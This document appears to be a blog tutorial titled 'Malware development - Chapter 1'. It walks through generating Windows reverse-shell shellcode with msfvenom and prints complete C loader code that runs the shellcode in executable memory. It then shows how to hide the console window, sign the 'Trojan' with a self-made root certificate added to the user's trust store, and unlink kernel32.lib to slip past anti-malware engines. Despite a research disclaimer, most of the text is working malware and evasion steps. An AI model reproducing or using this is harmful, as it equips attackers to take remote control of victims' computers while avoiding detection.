Malware development - Chapter 1

 

{getButton} $text={Introduce} $coloe={#919191}

Disclaimer:

The procedures (methods) provided in this series of articles may be offensive and are only used for security research and teaching. If the information is used for other purposes, the reader shall bear all legal and joint liabilities, and the laboratory shall not bear any legal and joint liabilities. {alertWarning}

Things needed: 

• Visual Studio
• Kali Linux
• Windows

{getButton} $text={Basic knowledge} $color={#00FF7f}

Use Kali Linux to generate shellcode. Command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.8.113 LPORT=4444 -f c{codeBox}

First, let's understand what is shell code?

The shell code is a hexadecimal machine code, which is interpreted by the CPU to obtain the shell on the target host.

Shell code can be divided into remote type and local type, depending on whether the attacker uses shell code to run locally or control the remote machine through it.

{getButton} $text={Shellcode Executing} $color={#87CEEB}

Edit code:

#include <Windows.h>

int main()

{

  const char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"

"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"

"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"

"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"

"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"

"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"

"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"

"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"

"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"

"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"

"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"

"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"

"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"

"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33"

"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"

"\x49\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x08\x71\x41\x54"

"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"

"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"

"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"

"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"

"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"

"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"

"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"

"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"

"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"

"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"

"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"

"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"

"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"

"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"

"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

  PVOID shellcode_exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode);

  DWORD threadID;

  HANDLE Thread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);

  WaitForSingleObject(Thread, INFINITE);

}{codeBox}

Let's take a look at this code:

VirtualAlloc(0, sizeof shellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE){codeBox}

We need to use the VirtualAlloc function of the Windows API to allocate memory. The syntax of this function is:

LPVOID VirtualAlloc(

  [in, optional] LPVOID lpAddress,

  [in]           SIZE_T dwSize,

  [in]           DWORD  flAllocationType,

  [in]           DWORD  flProtect

){codeBox}

Parameters:

• [in, optional] lpAddress: the starting address of the area to be allocated.
• [in] dwSize: the size of the area, in bytes.
• [in] flAllocationType: the type of memory allocation. The value used in the code is MEM_ COMMIT, the specified memory allocation cost for reserved memory pages (from the overall memory size and the page files on the disk); MEM_ RESERVE reserves the virtual address space range of the process, and does not allocate any actual physical storage in the memory or the page file on the disk.
• [in] flProtect: Memory protection of the page area to be allocated. If the page is committing, you can specify any memory protection constant.

This function is mainly used to reserve, submit or change the status of the page area in the virtual address space of the calling process. You can also use the VirtualAllocEx function to allocate memory in the address space of another process.

Then we need to fill in the shell code. Here we use RtlCopyMemory to copy the source memory block to the target memory block:

RtlCopyMemory(shellcode_exec, shellcode, sizeof shellcode){codeBox}

Next, we need to create a process to execute in the virtual address space of the calling process, and use the function CreateThread to create it.

DWORD threadID;

HANDLE Thread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);{codeBox}

Parameters:

• [in, optional] lpThreadAttributes: Point to SECURITY_ Pointer to the ATTRIBUTES structure, which determines whether the returned handle can be inherited by child processes.
• [in] dwStackSize: the initial size of the stack, in bytes.
• [in] lpStartAddress: Pointer to the application defined function to be executed by the thread.
• [in, optional] lpParameter: Pointer to the variable to be passed to the thread.
• [in] dwCreationFlags: Flag to control thread creation. In the code, 0 means that the thread runs immediately after creation.
• [out, optional] lpThreadId: Pointer to the variable receiving thread identifier.

Then we use the WaitForSingleObject function to check the status of HANDLE. The complete statement is:

DWORD threadID;

HANDLE Thread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)shellcode_exec, NULL, 0, &threadID);

WaitForSingleObject(Thread, INFINITE);{codeBox}

Compile and run to receive the session.

{getButton} $text={Patch}

Add in the code to mask the console window:

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\""){codeBox}

Windows system and some browsers (such as IE, Firefox) use a technology called digital authentication code to identify the software publisher to check that the software is not affected by viruses. If your software is not signed with a digital authentication code, users will receive a warning "The software publisher cannot be successfully verified. Do you want to continue running this software?" Many users will give up using this software for security reasons.

Enter command:

makecert -r -pe -n "CN=Diy CA" -ss CA -sr CurrentUser -a sha256 -cy authority -sky signature -sv DIY.pvk DIY.cer{codeBox}

• -r: Self signature.
• -Pe: Mark the generated private key as exportable.
• -n: CA issuing the certificate.
• -Ss: certificate store name.
• -Sr: the location where the certificate is stored.
• -a: Specify signature algorithm.
• -Cy: Specify the certificate type.
• -Sky: specify the key type.
• -Sv: Specify the. pvk private key file. If not, create one.

Store the certificate and enter the command:

certutil -user -addstore Root DIY.cer{codeBox}

Use the certificate you created to grant authorization. Enter the command:

makecert -pe -n "CN=Diy Cert" -a sha256 -cy end -sky signature -ic DIY.cer -iv DIY.pvk -sv DiyCert.pvk DiyCert.cer{codeBox}

• -Ic: Specify the issuer's certificate file.
• -Iv: Specify the issuer's. pvk private key file.
• -Sv: Specify the. pvk private key file of the theme. If not, create one.

Use Pvk2Pfx tool to convert. spc The public key and private key information contained in the cer and pvk files are copied to the personal information Exchange (. pfx) file:

pvk2pfx -pvk DiyCert.pvk -spc DiyCert.cer -pfx DiyCert.pfx{codeBox}

• -Pvk: specify a. pvk file.
• -Spc: Specify the name and extension of the certificate file. You can specify. spc or. der.
• -Pfx: specify a. pfx file.

Specify Trojan file signature:

signtool sign /v /f DiyCert.pfx /t http://timestamp.comodoca.com/authenticode x64/Debug/diy.exe{codeBox}

When using the Visual C++project to compile and link properties, when removing other dependencies from the linker options (especially kernel32.lib), some anti malware engines will stop marking the generated executable as a malicious file. The kernel32. lib static library will still be statically linked after compilation, because the executable knows where to find the necessary API functions (kernel32.dll).